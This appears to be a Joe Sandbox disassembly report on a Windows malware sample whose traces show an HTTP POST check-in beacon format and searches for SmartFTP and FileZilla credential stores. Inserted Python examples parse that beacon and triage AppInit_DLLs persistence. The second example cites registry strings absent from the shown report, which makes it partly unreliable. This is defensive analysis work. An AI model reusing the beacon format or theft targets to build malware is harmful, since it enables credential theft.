                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00409B00
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00409B0E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                • String ID: </title>$</url>$<title>$<url>
                                                                                                                                                                                                                • API String ID: 2525500382-2286408829
                                                                                                                                                                                                                • Opcode ID: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                                                                                                                                                                                                                • Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
                                                                                                                                                                                                                • Opcode Fuzzy Hash: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710,?,?,?,?,00402C8F,00000032,00000000,00000000,00000000,00000000,?), ref: 0040A91C
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710), ref: 0040AAC1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AAE9
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • 0, xrefs: 0040AA5B
                                                                                                                                                                                                                • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                                                                                                                                                                                                                • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                                                                                                                                                                                                                • API String ID: 3713053250-1268808612
                                                                                                                                                                                                                • Opcode ID: 27a49e9b0a243f6ea4d036eb24575c3a25ef3ed8582b626cf885f00009b11edd
                                                                                                                                                                                                                • Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27a49e9b0a243f6ea4d036eb24575c3a25ef3ed8582b626cf885f00009b11edd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
                                                                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
                                                                                                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00408452
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1974014688-0
                                                                                                                                                                                                                • Opcode ID: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                                                                                                                                                                                                                • Instruction ID: 01d1f8b5f38b633e5055412454defe488cd8fa266e80ff04f0611ceb3180ae32
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47115170500201FBEB305F56CE49E5BBBB9EB90700F10892DF596F21E0EB74A951DB28
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                                                                                                                                                                                                                • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                                                                                                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                                                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                                                                                                                                                                                                                • String ID: POST
                                                                                                                                                                                                                • API String ID: 961146071-1814004025
                                                                                                                                                                                                                • Opcode ID: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                                                                                                                                                                                                                • Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8
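Editor's added example (Python; not code from Joe Sandbox, the report, or the sample). The function at 0040A957 above formats the string `jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s`, and the WinINet sequence immediately above (InternetConnectW on port 00000050 = 80, HttpOpenRequestW with POST, HttpSendRequestW with a NULL header block, InternetReadFile) sends a request over plain HTTP, so the body is inspectable on the wire. That the formatted string is the POST body is an assumption not shown in this section; the host, path and field values in the sample request are constructed placeholders, not the sample's real C2. The block parses such a request, validates the `^`-separated record field by field, and reports whether a User-Agent header is present. WinINet only emits a User-Agent when an agent string was given to InternetOpenW, which this section does not show, so the example reports it as a separate indicator rather than folding it into the verdict.

```python
"""
Added example (not code from the report or the sample): parse the 'jstat'
check-in that 0040A957 formats and that 00409EA3-00409F00 POSTs over HTTP.
The request at the bottom is constructed for the example, not captured traffic.
"""
import re
from typing import Dict, Optional, Tuple

# Format string recovered from the sample (xref 0040A957). Tokens are separated
# by '^'; the first token is the literal record type, the rest are name=value.
JSTAT_FORMAT = "jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s"
JSTAT_FIELDS = re.findall(r"\^(\w+)=%s", JSTAT_FORMAT)  # rev, code, site, ...


def parse_jstat(body: str) -> Optional[Dict[str, str]]:
    """Return the record's fields as a dict, or None when the body is not a
    jstat record (wrong prefix, missing, extra or reordered fields)."""
    parts = body.strip().split("^")
    if parts[0] != "jstat" or len(parts) != len(JSTAT_FIELDS) + 1:
        return None
    fields: Dict[str, str] = {}
    for expected, token in zip(JSTAT_FIELDS, parts[1:]):
        name, sep, value = token.partition("=")
        if not sep or name != expected:
            return None
        fields[name] = value
    return fields


def parse_http_request(raw: bytes) -> Tuple[str, str, Dict[str, str], str]:
    """Minimal HTTP/1.x request parser returning (method, target, headers, body).
    Header names are lower-cased; latin-1 decoding keeps every byte intact."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body.decode("latin-1")


def triage_request(raw: bytes) -> dict:
    """Flag a request as a jstat check-in when it is a POST whose body is a
    well-formed record. The User-Agent observation is reported on its own:
    WinINet sends only the agent string passed to InternetOpenW, which this
    report section does not show, so it corroborates rather than decides."""
    method, target, headers, body = parse_http_request(raw)
    beacon = parse_jstat(body) if method == "POST" else None
    return {
        "method": method,
        "target": target,
        "no_user_agent": "user-agent" not in headers,
        "beacon": beacon,
        "is_jstat_checkin": beacon is not None,
    }


# Constructed sample request: path, host (TEST-NET address) and values are
# placeholders, not the sample's real infrastructure.
SAMPLE_BODY = b"jstat^rev=1^code=ABC^site=example.test^searches=3^clicks=1^adver=0^os=5.1"
SAMPLE_REQUEST = (
    b"POST /stat.php HTTP/1.1\r\n"
    b"Host: 192.0.2.10\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: %d\r\n"
    b"\r\n" % len(SAMPLE_BODY)
) + SAMPLE_BODY

if __name__ == "__main__":
    print(triage_request(SAMPLE_REQUEST))
```

Matching on the field set and order, rather than on the literal `jstat` prefix alone, keeps the check from firing on unrelated form posts that happen to start with the same word, and the parsed fields (site, searches, clicks, adver) are what an analyst would pivot on when correlating check-ins from several hosts.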
APIs
  • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
• ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB
Strings
• SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
• folder, xrefs: 00405184
• personal favorites, xrefs: 00405176
• SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: EnvironmentExpandOpenStrings
• String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
• API String ID: 3923277744-821743658
• Opcode ID: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
• Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
• Opcode Fuzzy Hash: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
• Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9
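Editor's added example (Python; not code from Joe Sandbox, the report, or the sample) covering two registry artifacts in this section: the function whose strings are AppInit_DLLs, C:\WINDOWS\system32\gbdwpbm.dll and Software\Microsoft\Windows NT\CurrentVersion\Windows (the AppInit_DLLs mechanism, which loads the listed DLLs into every process that maps user32.dll), and the function directly above, which opens the SmartFTP client 2.0 favorites and backup keys under HKEY_LOCAL_MACHINE (80000002 in the RegOpenKeyExW call) and passes a value through ExpandEnvironmentStringsW. The block works offline on a .reg export so it can run on a non-Windows analysis box: it lists the DLLs in AppInit_DLLs, reads LoadAppInit_DLLs, and expands the `folder` values of the two SmartFTP keys with a stand-in for ExpandEnvironmentStringsW. The .reg text, the environment variables, and the assumption that `folder` holds an environment-variable path are constructed for the example; the report also shows the string `personal favorites` but not how it is combined with the folder, so the example does not use it.

```python
"""
Added example (not code from the report or the sample): offline triage of two
registry artifacts this report associates with the sample, an AppInit_DLLs
entry and the SmartFTP favorites/backup folder values, from a .reg export.
The export and environment at the bottom are constructed for the example.
"""
import re
from typing import Dict, Union

RegValue = Union[str, int]
RegDump = Dict[str, Dict[str, RegValue]]

APPINIT_KEY = r"hkey_local_machine\software\microsoft\windows nt\currentversion\windows"
SMARTFTP_KEYS = (
    r"hkey_local_machine\software\smartftp\client 2.0\settings\general\favorites",
    r"hkey_local_machine\software\smartftp\client 2.0\settings\backup",
)

_VALUE_LINE = re.compile(r'^(@|"((?:[^"\\]|\\.)*)")=(.*)$')


def _unescape(s: str) -> str:
    # .reg string escapes: a backslash followed by any character stands for that character
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text: str) -> RegDump:
    """Parse the .reg subset needed here: [key] sections, "name"="string",
    "name"=dword:xxxxxxxx and @ for the default value. Key paths and value
    names are lower-cased because the registry is case-insensitive; other
    value types (hex:, hex(2): ...) keep their raw right-hand side."""
    dump: RegDump = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "Windows Registry Editor", "REGEDIT4")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            dump.setdefault(current, {})
            continue
        m = _VALUE_LINE.match(line)
        if current is None or not m:
            continue
        name = "" if m.group(1) == "@" else _unescape(m.group(2))
        rhs = m.group(3)
        if len(rhs) >= 2 and rhs.startswith('"') and rhs.endswith('"'):
            value: RegValue = _unescape(rhs[1:-1])
        elif rhs.startswith("dword:"):
            value = int(rhs[len("dword:"):], 16)
        else:
            value = rhs
        dump[current][name.lower()] = value
    return dump


def expand_environment_strings(value: str, env: Dict[str, str]) -> str:
    """Offline stand-in for ExpandEnvironmentStringsW: %NAME% is replaced from env
    (case-insensitive); names not in env are left untouched, as Windows does."""
    upper = {k.upper(): v for k, v in env.items()}
    return re.sub(r"%([^%]+)%", lambda m: upper.get(m.group(1).upper(), m.group(0)), value)


def triage_registry(dump: RegDump, env: Dict[str, str]) -> dict:
    """Report AppInit_DLLs persistence and the SmartFTP folders the sample reads."""
    win = dump.get(APPINIT_KEY, {})
    appinit = win.get("appinit_dlls", "")
    # Windows splits AppInit_DLLs on spaces and commas; on most hosts it is empty.
    dlls = [p for p in re.split(r"[ ,]+", appinit) if p] if isinstance(appinit, str) else []
    folders: Dict[str, str] = {}
    for key in SMARTFTP_KEYS:
        folder = dump.get(key, {}).get("folder")
        if isinstance(folder, str):
            folders[key.rsplit("\\", 1)[-1]] = expand_environment_strings(folder, env)
    return {
        "appinit_dlls": dlls,
        "load_appinit_dlls": win.get("loadappinit_dlls"),
        "appinit_persistence": bool(dlls),
        "smartftp_folders": folders,
    }


# Constructed .reg export and environment (XP-era layout to match the sample's
# C:\WINDOWS\system32 path); the SmartFTP value contents are assumed.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="C:\\WINDOWS\\system32\\gbdwpbm.dll"
"LoadAppInit_DLLs"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\smartftp\client 2.0\settings\general\favorites]
"folder"="%APPDATA%\\SmartFTP\\Client 2.0\\Favorites"

[HKEY_LOCAL_MACHINE\SOFTWARE\smartftp\client 2.0\settings\backup]
"folder"="%APPDATA%\\SmartFTP\\Client 2.0\\Backup"
"""
SAMPLE_ENV = {"APPDATA": r"C:\Documents and Settings\user\Application Data"}

if __name__ == "__main__":
    print(triage_registry(parse_reg_export(SAMPLE_REG), SAMPLE_ENV))
```

When running this against a real export, also dump the Wow6432Node copy of the Windows key, since 32-bit processes on 64-bit hosts read AppInit_DLLs from there, and remember that on Windows 8 and later with Secure Boot enabled the AppInit_DLLs mechanism is disabled regardless of the value, so a populated entry there is an artifact of the infection rather than working persistence.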
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 0040A0C0
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
Similarity
• API ID: CreateHandleInitializeModuleWindow
• String ID: AtlAxWin$Shell.Explorer
• API String ID: 950422046-1300462704
• Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
• Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
• Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
• Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65
APIs
• GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040286E), ref: 004072F9
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
• SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
• __aulldiv.LIBCMT ref: 00407359
Strings
Similarity
• API ID: Time$System$File$__aulldiv
• String ID: n(@
• API String ID: 3735792614-2525614082
• Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
• Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
• Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
• Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
• CharLowerW.USER32(?), ref: 0040ABA0
• GetCommandLineW.KERNEL32 ref: 0040ABC0
Strings
Similarity
• API ID: CharCommandFileLineLowerModuleName
• String ID: /updatefile3$netprotdrvss.exe
• API String ID: 3118597399-3449771660
• Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
• Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
• Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
• Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D
APIs
• GetTickCount.KERNEL32 ref: 00409FCE
• GetTickCount.KERNEL32 ref: 00409FDE
• Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
• DispatchMessageW.USER32(?), ref: 0040A009
Similarity
• API ID: CountMessageTick$DispatchPeekSleep
• String ID:
• API String ID: 4159783438-0
• Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
• Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
• Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
• Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A
APIs
• GetTickCount.KERNEL32 ref: 00409F5B
• GetTickCount.KERNEL32 ref: 00409F5F
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
• DispatchMessageW.USER32(?), ref: 00409F80
• Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
Similarity
• API ID: CountMessageTick$DispatchPeekSleep
• String ID:
• API String ID: 4159783438-0
• Opcode ID: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
• Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
• Opcode Fuzzy Hash: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
• Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58
APIs
  • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
  • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
  • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
  • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
  • Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
  • Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
  • Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
• CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
• SysFreeString.OLEAUT32(?), ref: 0040875A
Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
                                                                                                                                                                                                                • String ID: http://$+@
                                                                                                                                                                                                                • API String ID: 147727044-3628382792
                                                                                                                                                                                                                • Opcode ID: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                                                                                                                                                                                                                • Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20
                                                                                                                                                                                                                  • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                                                                                                                                                                                                                  • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$CreateModuleNamePointerWrite
                                                                                                                                                                                                                • String ID: UniqueNum$x
                                                                                                                                                                                                                • API String ID: 594998759-2399716736
                                                                                                                                                                                                                • Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                                                                                                                                                                                                                • Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                                                                                                                                                                                                                  • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                                                                                                                                                                                                                  • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                                                                                                                                                                                                                  • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                                                                                                                                                                                                                  • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.2136755020.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136682082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136846200.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.2136908453.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_nNX5KYQRhg.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                                                                                                                                                                                                                • String ID: #$&$*filezilla*
                                                                                                                                                                                                                • API String ID: 3438805939-758400021
                                                                                                                                                                                                                • Opcode ID: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                                                                                                                                                                                                                • Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5
                                                                                                                                                                                                                  • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
